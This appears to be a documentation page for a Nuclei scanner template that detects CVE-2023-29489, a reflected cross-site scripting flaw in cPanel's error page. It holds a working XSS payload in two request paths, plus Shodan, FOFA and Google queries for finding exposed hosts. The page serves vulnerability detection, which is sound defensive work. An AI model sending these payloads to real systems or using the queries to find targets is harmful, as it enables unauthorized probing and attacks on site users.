cPanel < 11.109.9999.116 - Cross-Site Scripting
ID: CVE-2023-29489
Severity: medium
Author: DhiyaneshDk,0xKayala
Tags: cve,cve2023,cpanel,xss
Description
Section titled “Description”An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
YAML Source
Section titled “YAML Source”id: CVE-2023-29489
info: name: cPanel < 11.109.9999.116 - Cross-Site Scripting author: DhiyaneshDk,0xKayala severity: medium description: | An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by cPanel to fix this vulnerability. reference: - https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/ - https://nvd.nist.gov/vuln/detail/CVE-2023-29489 - https://forums.cpanel.net/threads/cpanel-tsr-2023-0001-full-disclosure.708949/ - https://github.com/SynixCyberCrimeMy/CVE-2023-29489 - https://github.com/learnerboy88/CVE-2023-29489 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-29489 cwe-id: CWE-79 epss-score: 0.00354 epss-percentile: 0.71955 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cpanel product: cpanel shodan-query: - "title:\"cPanel\"" - http.title:"cpanel" - cpe:"cpe:2.3:a:cpanel:cpanel" - http.title:"cpanel - api codes" fofa-query: - "title=\"cpanel - api codes\"" - title="cpanel" google-query: - "intitle:\"cpanel - api codes\"" - intitle:"cpanel" tags: cve,cve2023,cpanel,xss
http: - method: GET path: - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa' - '{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror="prompt(document.domain)">'
stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa' - 'Invalid webcall ID:' condition: and
- type: status status: - 400# digest: 490a0046304402204717d5e08c37507ff8012a81d992eecfbd7989e8e4afb8ae242f3e26e5b8685e02200a824a3428816f14e421c57237f60470b7bf40b94b1a25cbef61853aebde2f7d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-29489.yaml"